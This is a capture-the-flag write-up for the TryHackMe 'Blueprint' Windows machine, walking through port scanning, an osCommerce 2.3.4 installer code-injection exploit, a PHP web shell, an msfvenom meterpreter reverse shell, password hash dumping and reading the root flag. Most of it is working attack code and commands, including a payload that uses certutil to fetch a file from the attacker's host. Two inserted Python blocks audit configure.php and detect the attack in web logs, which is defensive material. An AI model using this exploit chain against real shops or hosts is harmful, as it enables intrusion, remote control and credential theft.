THM Writeup – Blueprint
![THM Writeup - Blueprint](https://cdn.titus74.com/wp-content/uploads/2022/04/03133905/0ee34224ad2747f09b0f08610a9abb89-65px.png)
Hack into this Windows machine and escalate your privileges to Administrator.
![](https://cdn.titus74.com/wp-content/uploads/2022/04/03134207/998045a4ba944f6c91a548a899383b87-1024x855.png)
Do you have what it takes to hack into this Windows Machine?
Add the IP address to your hosts file:
echo '10.10.32.200 blueprint.thm' >> /etc/hosts
Scan the target machine – find open ports first:
nmap -n -Pn -sS -p- --open --min-rate 5000 -vvv blueprint.thm
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 128
135/tcp open msrpc syn-ack ttl 128
139/tcp open netbios-ssn syn-ack ttl 128
443/tcp open https syn-ack ttl 128
445/tcp open microsoft-ds syn-ack ttl 128
3306/tcp open mysql syn-ack ttl 128
8080/tcp open http-proxy syn-ack ttl 128
49152/tcp open unknown syn-ack ttl 128
49153/tcp open unknown syn-ack ttl 128
49154/tcp open unknown syn-ack ttl 128
49158/tcp open unknown syn-ack ttl 128
49159/tcp open unknown syn-ack ttl 128
49160/tcp open unknown syn-ack ttl 128
Get more details about open ports:
nmap -T4 -A -p 80,135,139,443,445,3306,8080,49152-49154,49158-49160 blueprint.thm
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 404 - File or directory not found.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Index of /
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Index of /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Check the web application on port 80: browse to http://blueprint.thm
![server error](https://cdn.titus74.com/wp-content/uploads/2022/04/03134507/e8a994be0fe744c3815e4e6752f36286.png)
The same 404 that nmap found, of course 🙂
Check the web application on port 443: browse to https://blueprint.thm
![blueprint app on port 443](https://cdn.titus74.com/wp-content/uploads/2022/04/03134602/96884416f9b04d9c96f7a4861dbedb31.png)
Explore the oscommerce folder:
![oscommerce directory](https://cdn.titus74.com/wp-content/uploads/2022/04/03134651/b8a76c754744414e955ff3654f4f7534.png)
When we click on the catalog directory, there is a web site:
![eshop web app](https://cdn.titus74.com/wp-content/uploads/2022/04/03134743/b53c1dcb93104161846bbdfb1768893e-1024x470.png)
It’s probably osCommerce’s storefront.
When we click on the docs directory, there is detailed osCommerce documentation:
![oscommerce docs directory](https://cdn.titus74.com/wp-content/uploads/2022/04/03134848/18feb8a68db743f6bb118f3b444063cc.png)
Now let’s check port 8080, browse to http://blueprint.thm:8080
![blueprint web app on port 8080](https://cdn.titus74.com/wp-content/uploads/2022/04/03134939/1b694065d1ca4f038c6139715d402972.png)
It looks the same as on port 443, and when we check it, we find that it is exactly the same.
As we have osCommerce 2.3.4 running on http://blueprint.thm:8080/oscommerce-2.3.4/catalog/, let’s check whether there is an exploit for this product:
root@ip-10-10-211-38:~# searchsploit oscommerce 2.3.4
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
osCommerce 2.3.4 - Multiple Vulnerabilities | php/webapps/34582.txt
osCommerce 2.3.4.1 - 'currency' SQL Injection | php/webapps/46328.txt
osCommerce 2.3.4.1 - 'products_id' SQL Inject | php/webapps/46329.txt
osCommerce 2.3.4.1 - 'reviews_id' SQL Injecti | php/webapps/46330.txt
osCommerce 2.3.4.1 - Arbitrary File Upload | php/webapps/43191.py
osCommerce 2.3.4.1 - Remote Code Execution | php/webapps/44374.py
---------------------------------------------- ---------------------------------
We’re going to use the Remote Code Execution exploit, file 44374.py.
Locate the exploit and copy it to the current directory:
root@ip-10-10-240-99:~# locate php/webapps/44374.py
/opt/searchsploit/exploits/php/webapps/44374.py
root@ip-10-10-240-99:~# cp /opt/searchsploit/exploits/php/webapps/44374.py .
We need to modify the script: change base_url and target_url to the location where osCommerce is running in our case, and add our PHP payload:
    import requests

    # enter the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
    base_url = "http://blueprint.thm:8080/oscommerce-2.3.4/catalog/"
    target_url = "http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/install.php?step=4"

    data = {
        'DIR_FS_DOCUMENT_ROOT': './'
    }

    # the payload will be injected into the configuration file via this code
    # ' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
    # so the format for the exploit will be: '); PAYLOAD; /*
    payload = '\');'
    payload += '$var = shell_exec("cmd.exe /C certutil -urlcache -split -f http://10.10.240.99:8000/shell.php shell.php");'
    payload += 'echo $var;'
    payload += '/*'
    data['DB_DATABASE'] = payload

    # exploit it
    r = requests.post(url=target_url, data=data)
    if r.status_code == 200:
        # the URL printed here is the one shown in the exploit output below
        print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
    else:
        print("[-] Exploit did not execute as planned")
Create a .php file that adds a cmd query parameter to the application, so we can issue commands to the OS, and then run a python3 web server:
root@ip-10-10-211-38:~# echo '<?php echo system($_GET["cmd"]); ?>' > shell.php
root@ip-10-10-240-99:~# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Run the exploit:
root@ip-10-10-240-99:~# python3 44374.py
[+] Successfully launched the exploit. Open the following URL to execute your code
http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/configure.php
Click on the url provided by the exploit and wait for the execution.
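The injection works because the installer writes the raw DB_DATABASE value straight into configure.php, so a tampered file no longer has the plain define('KEY', 'value'); shape on every line. The following is an added defensive check, not part of this writeup or of osCommerce: it audits a configure.php body for that shape, for command-execution calls, and for the unterminated /* the payload leaves behind. Both samples are constructed and the file layout is assumed.

```python
import re

# Constructed fragment of a clean osCommerce configure.php (assumed layout, not from the page).
CLEAN_CONFIGURE = """<?php
define('DB_SERVER', 'localhost');
define('DB_SERVER_USERNAME', 'root');
define('DB_DATABASE', 'oscommerce');
define('DB_TABLE_PREFIX', '');
"""

# Constructed sample reproducing the injection shape: the DB_DATABASE value closes the
# string literal, runs code, then opens /* to swallow the rest of the generated line.
TAMPERED_CONFIGURE = """<?php
define('DB_SERVER', 'localhost');
define('DB_DATABASE', '');$var = shell_exec($_GET["cmd"]);echo $var;/*');
define('DB_TABLE_PREFIX', '');
"""

# A legitimate installer-written line is exactly define('KEY', 'value'); with no quote
# or backslash inside the value.
STRICT_DEFINE = re.compile(r"^\s*define\('[A-Z_]+',\s*'[^'\\]*'\);\s*$")
# Functions that have no business being called from a configuration file.
DANGEROUS = re.compile(r"\b(shell_exec|system|exec|passthru|popen|proc_open|eval)\s*\(")

def audit_configure(source: str) -> list:
    """Return human-readable findings for one configure.php body; [] means it looks untouched."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith("define(") and not STRICT_DEFINE.match(line):
            findings.append(f"line {lineno}: define() does not have the plain key/value shape")
        if DANGEROUS.search(line):
            findings.append(f"line {lineno}: command-execution or eval call inside a config file")
    # the payload opens a /* comment that is never closed
    if source.count("/*") > source.count("*/"):
        findings.append("unterminated /* comment (typical of a string-break injection)")
    return findings

if __name__ == "__main__":
    for name, body in (("clean", CLEAN_CONFIGURE), ("tampered", TAMPERED_CONFIGURE)):
        print(name, audit_configure(body) or "no findings")
```

Run it against the real install/includes/configure.php on a deployed shop; the simplest fix remains deleting the install/ directory after setup, as the osCommerce installer itself advises.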
Now browse to http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/shell.php?cmd=whoami
![shell php](https://cdn.titus74.com/wp-content/uploads/2022/04/03135352/716663cbcb124e74a2f83c8574140d5d-1024x104.png)
Ehm, there is a filter. Never mind, we’ll try to bypass it – overwrite shell.php:
root@ip-10-10-240-99:~# echo '<?php echo shell_exec($_GET["cmd"]); ?>' > shell.php
Run the exploit again:
root@ip-10-10-240-99:~# python3 44374.py
[+] Successfully launched the exploit. Open the following URL to execute your code
http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/configure.php
Visit the link again:
http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/configure.php
Now browse to http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/shell.php?cmd=whoami
![shell php whoami](https://cdn.titus74.com/wp-content/uploads/2022/04/03135855/cf3da9a5fdd3410a90ad239211ebdaec.png)
Great, this works and we are the privileged nt authority\system user, so let’s upload a reverse shell.
Generate a reverse shell using msfvenom:
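From the web server's side the whole chain leaves three distinctive requests in the access log: the POST to install/install.php?step=4, a direct fetch of install/includes/configure.php, and a cmd= request to a file under install/includes/. The following is an added detection example, not from this writeup, that runs that logic over constructed Apache-style log lines (IPs, timestamps and sizes are made up) and reports which source completed the full write-then-trigger sequence.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines modelled on the request sequence in this writeup.
SAMPLE_LOG = """\
10.10.240.99 - - [03/Apr/2022:13:50:01 +0000] "GET /oscommerce-2.3.4/catalog/index.php HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
10.10.240.99 - - [03/Apr/2022:13:53:52 +0000] "POST /oscommerce-2.3.4/catalog/install/install.php?step=4 HTTP/1.1" 200 512 "-" "python-requests/2.22.0"
10.10.240.99 - - [03/Apr/2022:13:54:10 +0000] "GET /oscommerce-2.3.4/catalog/install/includes/configure.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.240.99 - - [03/Apr/2022:13:54:30 +0000] "GET /oscommerce-2.3.4/catalog/install/includes/shell.php?cmd=whoami HTTP/1.1" 200 33 "-" "Mozilla/5.0"
10.10.1.7 - - [03/Apr/2022:13:55:00 +0000] "GET /oscommerce-2.3.4/catalog/product_info.php?products_id=1 HTTP/1.1" 200 9100 "-" "Mozilla/5.0"
"""

# Apache combined format: client ip, ident, user, [timestamp], "METHOD target PROTO", status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(line: str):
    """Return (src_ip, tag) for a suspicious request, or None for a benign one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, method, target, _status = m.groups()
    parts = urlsplit(target)
    path, query = parts.path.lower(), parse_qs(parts.query)
    if path.endswith("/install/install.php"):
        step = query.get("step", ["?"])[0]
        return ip, f"installer reachable after deployment (method={method}, step={step})"
    if "/install/includes/" in path and "cmd" in query:
        return ip, "command parameter sent to a file under install/includes/"
    if path.endswith("/install/includes/configure.php"):
        return ip, "direct fetch of configure.php (the app only ever include()s it)"
    return None

def detect_chain(log: str) -> dict:
    """Group findings per source IP and mark sources that hit the installer and then
    triggered something under install/includes/, i.e. completed the sequence above."""
    per_ip = {}
    for line in log.splitlines():
        hit = classify(line)
        if hit:
            per_ip.setdefault(hit[0], []).append(hit[1])
    return {ip: {"findings": tags,
                 "full_chain": any(t.startswith("installer") for t in tags) and len(tags) > 1}
            for ip, tags in per_ip.items()}

if __name__ == "__main__":
    for ip, result in detect_chain(SAMPLE_LOG).items():
        print(ip, result)
```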
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.240.99 LPORT=4242 -f exe > shell.exe
Run python http server again:
root@ip-10-10-240-99:~# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Modify the payload in your exploit script:
![payload](https://cdn.titus74.com/wp-content/uploads/2022/04/03140035/ae0b4761145947e893b23db46bc31cd1-1024x70.png)
Run metasploit and get multi/handler ready:
root@ip-10-10-240-99:~# msfconsole
msf5 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.240.99
LHOST => 10.10.240.99
msf5 exploit(multi/handler) > set LPORT 4242
LPORT => 4242
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.240.99:4242
Run the exploit again:
root@ip-10-10-240-99:~# python3 44374.py
[+] Successfully launched the exploit. Open the following URL to execute your code
http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/configure.php
Visit configure.php and wait for the execution:
![multi handler](https://cdn.titus74.com/wp-content/uploads/2022/04/03140228/5cf7c37b2c0d40ec9baab68901867aa0.png)
Now we have a shell on the target machine.
Let’s dump the hashes:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[REDACTED]:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:[REDACTED]:::
meterpreter >
To crack the hash, use for example https://crackstation.net/
![crackstation](https://cdn.titus74.com/wp-content/uploads/2022/04/03140628/f33ea340eea641f5a006a828c31983d6-1024x429.png)
Now you can answer the first question:
“Lab” user NTLM hash decrypted
The root flag should be on the Administrator’s desktop:
meterpreter > cd C:/Users/Administrator/Desktop
meterpreter > pwd
C:\Users\Administrator\Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2019-04-11 23:36:47 +0100 desktop.ini
100666/rw-rw-rw- 37 fil 2019-04-11 23:40:59 +0100 root.txt.txt
meterpreter > cat root.txt.txt
THM{[REDACTED]}
Do you like this writeup? Check out other THM Writeups.